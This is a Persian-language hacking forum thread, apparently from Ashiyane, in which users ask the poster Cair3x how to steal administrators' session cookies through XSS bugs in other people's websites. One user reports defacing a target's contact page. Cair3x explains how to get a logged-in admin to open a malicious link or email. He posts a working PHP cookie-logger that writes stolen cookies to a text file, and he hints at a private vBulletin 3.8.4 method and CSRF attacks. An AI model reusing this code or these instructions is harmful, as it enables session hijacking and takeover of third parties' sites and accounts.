یک درخواست از آقای Cair3x

[H@cker]

سلام خدمت همه دوستان زحمت کش آشیانه

ببخشید من یه سوال از آقای کایرکس داشتم که مربوط به تاپیک :

http://ashiyane.org/forums/showthread.php?p=85822

هسش ، که اونجا نمیشد پست بدم

و خیلی هم عذر میخوام که اینجا سوال و یا درخواستم رو میکنم

ببخشید من این فیلمو دانلود کردم

و راسش توی بعضی قسمتاش گیر کردم

آقای کایرکس شما یه فرومی انتخاب کردین که باگش تو قسمتی هسش که میشه یه چیزی رو آپلود کرد

مثلآ باگ تو قسمت یه تاپیک هسش

ولی تارگت من اینجوری نیس

یعنی باگ توی قسمتی نیس که من بتونم چیزی رو آپلود کنم ، تو قسمت http://www.xxxxxx.com/contact.php هسش !

و وقتی که یه اسکریپ یا >"><script>alert(/Cair3x/)</script> رو توی فورم تماس با ما قرار میدم و گذینه ی ارسال رو میزنم و در آخر پیغام Cair3x رو نشون میده

اگه در راجع به این روش فیلمی رو بسازین ممنون میشم

البته من تونسم با این باگ همون صفحه رو هم دیفس کنم ( بطور موقت )

و من بیشترین مشکلم اینه که میخوام Cookie ها رو بزنم و نمیتونم !

و شاید هم بگین ، شاید کسی یا admin صفحه رو مشاهده نکرده ، خب اگه نکرده باشه نباید کوکی من بیاد ؟

اگه یه فیلمی در راجع به این بسازین ممنون میشم

البته من هم از همون کدهای php هم استفاده کردم اما به نتیجه نرسیدم

اگه توی آموزشتون از Script.js استفاده کنین بهتره البته شما خودتون استاد این کارا هستین

ولی چون من هر فیلم آموزشی که دیدم همشون از یه روش استفاده میکردن و این هم همون Script.js بود ( جاوا اسکریپت ) و همشون هم متاسفانه میگفتن خوب ما از قبل یه Script.js رو یه جا آپلود کردیم و از این چیزا...... و در این صورت ما کد هایی که داخل js به کار رفته بود رو نمیدیدیم

فک کنم این یک مشکلی هسش که همه دارن که وقتی هم یه سوال میکنن و یا یه تاپیکی رو باز میکنن ، همه میگن زحمت بکشین یه سرچی بزنین

و معمولا توی فیلم ها هم بیشترشون یا شاید هم بگم همشون میگن خب ما این کارو از قبل انجام دادم یا یه چیزی رو آپلود کردم و و و و خیلی چیزا...........

خب این هم از درخواست ما از آقای کایرکس

باتشکر

[H@cker]

کایرکس عزیز

اگه زودتر کاره مارو راه بندازین ممنون میشم

[Cair3x]

سلام دوست عزیز !

اگه به قوانین یه نگاهی مینداختی و عنوان رو درست انتخاب میکردی زودتر به نتیجه میرسیدی !

خوب هیچ فرقی نداره که باگ شما از نوع اپلود باشه یا اسکریپت تو Url یا هر فرم دیگه !

شما دقیقا کارایی که من تو فیلم انجام دادم رو انجام بدید ! و لینک رو به مدیر بدید ! فرقی نمیکنه که مدیر حتما تو صفحه ادمین باشه یا نه ! فقط باید لاگین باشه ! که 90% لاگین هست ! چون سایت خودشه و حتما یه سر بهش میزنه با یوزر و پس خودش !

اگه باگ شما تو Url نمی یاد ! یعنی نمیتونی Url بدی مدیر باید براش یه جورایی اکسپلویت بنویسی ! که اونم نیازمند دانستن زبان های Php , javascript و . هست !

یه جورایی مثل اینکه Worm بنویسی ! یعنی برنامه خودکار کوکی های ادمین رو بهت بده بدون اینکه Urlسایتش رو بهش بدی !

مثلا میتونی اسکریپت خودتو بفرستی به ایمیل ش ! اگه اسکریپت کامل باشه همه کار رو خودش انجام میده !

در ضمن یه مقوله خیلی گسترده هست ! حتی در هک کردن DNS خیلی به کار میاد !

[BLACK H4T]

سلام بر همه دوستان مخصوصا Cair3x
دوست من مشکل من هم در رابطه با این فیل و اموزش شماست
الگوریتم هش کننده ی فایل ها در اتکمنت تغیر کرده؟ در صورتی که ورژن برنامه همونیه که شما باگشو اعلام کردید(یه جایه کار مشکل داره)
در ضمن این تاپیک 2 روزه بی جواب مونده
لطفا یکی رسیدگی کنه
http://www.ashiyane.org/forums/showt...9043#post89043

[H@cker]

سلام

جناب کایرکس

من الان همون تارگت اینبار باگ xss رو توی قسمت URL پیدا کردم

و نیاز به SMF و C o o k i e.php هایی که توی فیلم بکار بردین رو لازم دارم

اگه اینجا بزارین ممنون میشم

راسی اگه فایل attahement توی تارگتم نباشه چیکار کنم

[Cair3x]

نقل قول:

سلام بر همه دوستان مخصوصا Cair3x
دوست من مشکل من هم در رابطه با این فیل و اموزش شماست
الگوریتم هش کننده ی فایل ها در اتکمنت تغیر کرده؟ در صورتی که ورژن برنامه همونیه که شما باگشو اعلام کردید(یه جایه کار مشکل داره)

سلام دوست عزیز !

الگوریتم هش کد کننده SmF تغییری نکرده و همونه ! تو فیلم خیلی واضح و مبتدی توضیح دادم تعجب میکنم مشکل دارید !

اینم باگش که تو سایت های امنیتی به نام اشیانه ثبت شد !

کد:

http://securityreason.com/wlb_show/WLB-2010020012

نقل قول:

سلام

جناب کایرکس

من الان همون تارگت اینبار باگ xss رو توی قسمت URL پیدا کردم

و نیاز به SMF و C o o k i e.php هایی که توی فیلم بکار بردین رو لازم دارم

اگه اینجا بزارین ممنون میشم

راسی اگه فایل attahement توی تارگتم نباشه چیکار کنم

دوست عزیز سلام !

تارگت شما یه چیزه دیگه هست ! و ربطی به SMF نداره ! اما فایل Cookie رو برات میزارم که کارت راه بیوفته !

کد PHP:

<?php
$error = "The page cannot be display";
$filename = "cookielog.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo $error;
exit();
}
else
{
if (fwrite($handle,"\r\n".$_GET["cookie"]) === FALSE)
{
echo $error;
exit();
}}
echo $error;
fclose($handle);
exit();
}
echo $error;
exit();
?>

اگه باگ رو تو URL پیدا کردید اصلا نیازی به attahement نیست عزیز ! این مال موقعی هست که سایت باگ نداشته باشه ! که بتونید فایل اپلود کنید ! در ضمن Xss متد جدید و 0day داره که اگه سایت اصلا باگ Xss نداشته باشه میشه براش باگ ایجاد کرد و Cookie ها رو هم زد !

[H@cker]

جناب کایرکس میشه توی فروم های 3.8.4 هم از این SMF استفاده کرد ؟

وای چه شود اگه بشه

[Cair3x]

اگه منظورت از فروم 3.8.4 انجمن vBulletin 3.8.4 هست ! باید بگم نه عزیز نمشه ! اخه این انجمن تو اپلود یه خورده زیاد دقت میکنه ! حتی تو مدیریتشم همینطوره ! اما بازم راهی هست !

[H@cker]

نقل قول:

نوشته اصلی توسط Cair3x

اگه منظورت از فروم 3.8.4 انجمن vBulletin 3.8.4 هست ! باید بگم نه عزیز نمشه ! اخه این انجمن تو اپلود یه خورده زیاد دقت میکنه ! حتی تو مدیریتشم همینطوره ! اما بازم راهی هست !

بابا اِیول بابا اِیــــــــول

یو دیگه کی هسی

حال کردیم ( اما بازم راهی هست ! )

خب حالا کو ، کجا

100 % پریویت هسش

پس حالا حالا ها باید صب کنیم که بینم کی پابلیک میشه

[“““]

سلام

ببخشید جناب کایرکس ما همین مشکل رو داریم اگه آموزش رو بزارین ممنون میشم

[ip.ddos]

سلام
داداشم علی چطوره؟ حاجی خبری ازت نیست این متود xss واسه 3.8.4 جدیده
هاجی بچه ها تشنه اند برسون راستی اموزشت مثل همیشه عالی بود راجبش بیشتر بگو داداشی
منتظریم دادا

[Cair3x]

سلام دوستان !

ممنونم که این همه به من لطف دارید !

عزیزان این باگ یه خورده پرایو هست ! اما راهنمایتون میکنم !

برید در مورد csrf بخونید و سعی کنید یاد بگیرید ! درسته سادست ! اما در عین سادگی پیچیده !

سوالی داشتید هم در خدمتم !

[Cair3x]

در ضمن ! این باگ csrf فرقی نمیکنه که تو چه پرتالی باشه ! یعنی مخصوص 3.8.4 نیست ! میتونه تو هر پورتالی باشه ! که میشه تو بیشتر پورتال ها پیداش کرد !

[“““]

علی جون یعنی میشه با این باگ چیکار کرد ؟

اینهم مثل xss عمل میکنه ؟